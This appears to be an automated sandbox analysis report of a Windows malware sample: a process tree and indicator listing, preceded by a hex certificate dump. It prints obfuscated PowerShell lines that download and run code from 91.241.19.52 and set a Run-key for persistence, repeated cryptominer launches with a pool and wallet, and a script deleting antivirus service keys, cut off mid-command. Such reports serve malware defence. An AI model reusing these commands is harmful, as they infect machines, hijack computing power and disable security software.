3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e fsucenter.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exepid process 1520 d4537efd24d9b886648bd32b6ce4da99.exe 1520 d4537efd24d9b886648bd32b6ce4da99.exe 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3000 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exepid process 1520 d4537efd24d9b886648bd32b6ce4da99.exe 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 3000 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
B702.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeDebugPrivilege 2084 B702.exe Token: SeRestorePrivilege 1624 WerFault.exe Token: SeBackupPrivilege 1624 WerFault.exe Token: SeDebugPrivilege 1624 WerFault.exe Token: SeDebugPrivilege 2220 WerFault.exe Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeDebugPrivilege 3928 WerFault.exe Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 Token: SeDebugPrivilege 3248 WerFault.exe Token: SeDebugPrivilege 204 WerFault.exe Token: SeShutdownPrivilege 3000 Token: SeCreatePagefilePrivilege 3000 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
ADCA.tmppid process 2100 ADCA.tmp -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3000 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d4537efd24d9b886648bd32b6ce4da99.exeADCA.exeADCA.tmpADCA.exeADCA.tmpBB97.exedescription pid process target process PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 3492 wrote to memory of 1520 3492 d4537efd24d9b886648bd32b6ce4da99.exe d4537efd24d9b886648bd32b6ce4da99.exe PID 3000 wrote to memory of 212 3000 ADCA.exe PID 3000 wrote to memory of 212 3000 ADCA.exe PID 3000 wrote to memory of 212 3000 ADCA.exe PID 212 wrote to memory of 1868 212 ADCA.exe ADCA.tmp PID 212 wrote to memory of 1868 212 ADCA.exe ADCA.tmp PID 212 wrote to memory of 1868 212 ADCA.exe ADCA.tmp PID 3000 wrote to memory of 2084 3000 B702.exe PID 3000 wrote to memory of 2084 3000 B702.exe PID 3000 wrote to memory of 2084 3000 B702.exe PID 1868 wrote to memory of 2648 1868 ADCA.tmp ADCA.exe PID 1868 wrote to memory of 2648 1868 ADCA.tmp ADCA.exe PID 1868 wrote to memory of 2648 1868 ADCA.tmp ADCA.exe PID 2648 wrote to memory of 2100 2648 ADCA.exe ADCA.tmp PID 2648 wrote to memory of 2100 2648 ADCA.exe ADCA.tmp PID 2648 wrote to memory of 2100 2648 ADCA.exe ADCA.tmp PID 3000 wrote to memory of 1808 3000 BB97.exe PID 3000 wrote to memory of 1808 3000 BB97.exe PID 3000 wrote to memory of 1808 3000 BB97.exe PID 3000 wrote to memory of 852 3000 BE96.exe PID 3000 wrote to memory of 852 3000 BE96.exe PID 3000 wrote to memory of 852 3000 BE96.exe PID 2100 wrote to memory of 1816 2100 ADCA.tmp fsucenter.exe PID 2100 wrote to memory of 1816 2100 ADCA.tmp fsucenter.exe PID 2100 wrote to memory of 1816 2100 ADCA.tmp fsucenter.exe PID 3000 wrote to memory of 2580 3000 CCFE.exe PID 3000 wrote to memory of 2580 3000 CCFE.exe PID 3000 wrote to memory of 2580 3000 CCFE.exe PID 3000 wrote to memory of 4072 3000 CFDE.exe PID 3000 wrote to memory of 4072 3000 CFDE.exe PID 3000 wrote to memory of 4072 3000 CFDE.exe PID 3000 wrote to memory of 3648 3000 D26F.exe PID 3000 wrote to memory of 3648 3000 D26F.exe PID 3000 wrote to memory of 3648 3000 D26F.exe PID 3000 wrote to memory of 716 3000 explorer.exe PID 3000 wrote to memory of 716 3000 explorer.exe PID 3000 wrote to memory of 716 3000 explorer.exe PID 3000 wrote to memory of 716 3000 explorer.exe PID 1808 wrote to memory of 3492 1808 BB97.exe Runtimebroker.exe PID 1808 wrote to memory of 3492 1808 BB97.exe Runtimebroker.exe PID 1808 wrote to memory of 3492 1808 BB97.exe Runtimebroker.exe PID 3000 wrote to memory of 2192 3000 explorer.exe PID 3000 wrote to memory of 2192 3000 explorer.exe PID 3000 wrote to memory of 2192 3000 explorer.exe PID 3000 wrote to memory of 1812 3000 explorer.exe PID 3000 wrote to memory of 1812 3000 explorer.exe PID 3000 wrote to memory of 1812 3000 explorer.exe PID 3000 wrote to memory of 1812 3000 explorer.exe PID 3000 wrote to memory of 212 3000 explorer.exe PID 3000 wrote to memory of 212 3000 explorer.exe PID 3000 wrote to memory of 212 3000 explorer.exe PID 3000 wrote to memory of 2652 3000 explorer.exe PID 3000 wrote to memory of 2652 3000 explorer.exe PID 3000 wrote to memory of 2652 3000 explorer.exe PID 3000 wrote to memory of 2652 3000 explorer.exe PID 3000 wrote to memory of 1136 3000 explorer.exe PID 3000 wrote to memory of 1136 3000 explorer.exe PID 3000 wrote to memory of 1136 3000 explorer.exe PID 3000 wrote to memory of 1536 3000 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ADCA.exeC:\Users\Admin\AppData\Local\Temp\ADCA.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-RGE0R.tmp\ADCA.tmp"C:\Users\Admin\AppData\Local\Temp\is-RGE0R.tmp\ADCA.tmp" /SL5="$40116,4193427,831488,C:\Users\Admin\AppData\Local\Temp\ADCA.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ADCA.exe"C:\Users\Admin\AppData\Local\Temp\ADCA.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-9AFQ8.tmp\ADCA.tmp"C:\Users\Admin\AppData\Local\Temp\is-9AFQ8.tmp\ADCA.tmp" /SL5="$6005E,4193427,831488,C:\Users\Admin\AppData\Local\Temp\ADCA.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\B702.exeC:\Users\Admin\AppData\Local\Temp\B702.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BB97.exeC:\Users\Admin\AppData\Local\Temp\BB97.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 8682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 9082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 9242⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 8562⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 8962⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 9762⤵
- Program crash
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 7723⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 7203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 8443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 9843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 10123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 11403⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete 